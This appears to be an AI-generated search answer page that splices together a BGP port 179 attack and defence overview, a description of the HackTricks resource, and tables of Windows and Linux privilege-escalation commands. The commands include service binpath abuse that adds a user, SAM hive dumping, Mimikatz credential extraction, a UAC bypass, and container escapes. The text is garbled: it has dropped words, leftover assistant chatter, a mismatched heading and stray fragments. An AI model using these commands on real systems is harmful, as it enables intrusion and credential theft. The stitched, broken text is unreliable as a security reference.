Below is a concise, structured, and actionable compilation of 179 practical offensive-security techniques, tools, and workflows inspired by common pentesting references and aggregated best practices. Each entry includes a short description, when to use it, and concise actionable steps or commands. Use responsibly and only on systems you own or are authorized to test.
Note: This is a long list; use Ctrl/Cmd+F to jump to sections.
If you want, I can:
Related search suggestions: (Invoking related search terms tool...)
The request references , the default port for the Border Gateway Protocol (BGP) , often discussed in cybersecurity guides like HackTricks
. BGP is a critical protocol used to exchange routing information between autonomous systems on the internet. Because of its importance, it is a high-value target for attacks like route hijacking and DoS.
Below is a draft "piece" structured as a technical overview for securing or assessing this port: Technical Overview: Port 179 (BGP) Exploitation & Defense 1. The Role of Port 179 Border Gateway Protocol (BGP).
Facilitates the exchange of routing information between large networks (ASNs). Default State:
Typically filtered and only open to specific, trusted peering partners. 2. Key Vulnerabilities & Attack Vectors Route Hijacking:
Maliciously announcing IP prefixes that do not belong to you, causing traffic to be diverted to your infrastructure. Session Reset/DoS: Sending spoofed TCP packets (e.g.,
floods) to tear down BGP peering sessions, leading to massive network instability. MD5 Password Cracking:
If peering sessions use MD5 authentication, attackers may capture handshake packets and attempt to crack the password offline using tools like 3. Assessment Checklist (The "HackTricks" Approach) Footprinting:
Identify BGP speakers by scanning Port 179; if open, it suggests the target is a router or edge device. Information Gathering: AS Numbers and neighbors. Tools like can be used to simulate peering. Authentication Check: MD5 signatures
are enforced on the TCP session. Without them, session hijacking is significantly easier. 4. Mitigation Strategies Access Control Lists (ACLs):
Restrict Port 179 access strictly to the IP addresses of known peering partners. BGP Route Origin Validation (ROV): to verify the source of the route and prevent hijacking. Control Plane Policing (CoPP):
Use CoPP to rate-limit traffic destined for the router’s CPU to prevent DoS via Port 179. TTL Security (GTSM):
Use the Generalized TTL Security Mechanism (RFC 5082) to reject BGP packets that haven't originated from a directly connected neighbor. (like route hijacking) or more detailed configuration examples for a specific router OS? HackTricks
Since "179" is not a standard chapter number in the official HackTricks book (which is organized by technology like Linux, Windows, Cloud, etc.), I will provide a comprehensive write-up on what HackTricks is, why it is considered the "best" resource for security professionals, and highlight some of the specific techniques that are often cited as "best" or "top-tier" (which might correspond to high-ranking entries on bookmark lists).
Here is a write-up on the topic.
In the world of cybersecurity, specifically within the domains of Penetration Testing, Red Teaming, and Bug Bounty hunting, few resources are as ubiquitous and revered as HackTricks.
Maintained primarily by Carlos Polop, HackTricks is an open-source encyclopedia of security attack patterns, techniques, and command-line snippets. It serves as a "cheat sheet" on steroids, bridging the gap between theoretical knowledge and practical execution.
If one were to curate a list of the "Best" hacks within the book, they typically fall into the category of Local Privilege Escalation (LPE). These are the moments during an engagement where a tester moves from a low-privilege user (like www-data) to root or SYSTEM.
| # | Trick | Command / Technique |
|---|-------|----------------------|
| 31 | AlwaysInstallElevated MSI | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer |
| 32 | Unquoted service paths | wmic service get name,displayname,pathname,startmode |
| 33 | Weak service permissions (sc.exe) | sc config SERVICE binpath="cmd.exe /c net user hacker pass /add" |
| 34 | SeImpersonate (Potato家族) | JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" |
| 35 | Saved RDP credentials | cmdkey /list → runas /savecred |
| 36 | SAM & SYSTEM backup | reg save hklm\sam sam.save |
| 37 | Writable %PATH% folders | where.exe check + drop whoami.exe |
| 38 | PrintNightmare (CVE-2021-34527) | MS-RPRN → SharpPrintNightmare.exe |
| 39 | UAC bypass – fodhelper | reg add HKCU\Software\Classes\ms-settings\shell\open\command |
| 40 | Logon scripts from registry | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" |
| ... | ... | ... |
| 60 | Mimikatz sekurlsa | sekurlsa::logonpasswords |
Web hacking can be infinite, but the "179 best" list focuses on high-impact, low-hanging fruit.
| # | Trick | Command / Technique |
|---|-------|----------------------|
| 1 | Find SUID binaries | find / -perm -4000 2>/dev/null |
| 2 | Exploit writable /etc/passwd | openssl passwd -1 -salt hacker password → add entry |
| 3 | Sudo abuse (CVE-2021-3156) | sudoedit -s / |
| 4 | LD_PRELOAD injection | Compile malicious .so → LD_PRELOAD=./mal.so ./suid_bin |
| 5 | Docker group escape | docker run -v /:/mnt -it alpine |
| 6 | Cron job wildcard injection | Write to /etc/cron.hourly/ with wildcard commands |
| 7 | PATH hijacking | PATH=.:$PATH then create malicious ls |
| 8 | NFS no_root_squash | mount -o rw,vers=2 and write SUID |
| 9 | Capabilities – CAP_SETUID | ./binary -p to spawn root shell |
| 10 | LXD group abuse | lxc init alpine -c security.privileged=true |
| ... | ... | ... |
| 30 | Kernel exploits (check distro) | uname -a → searchsploit |
WeChat
Weibo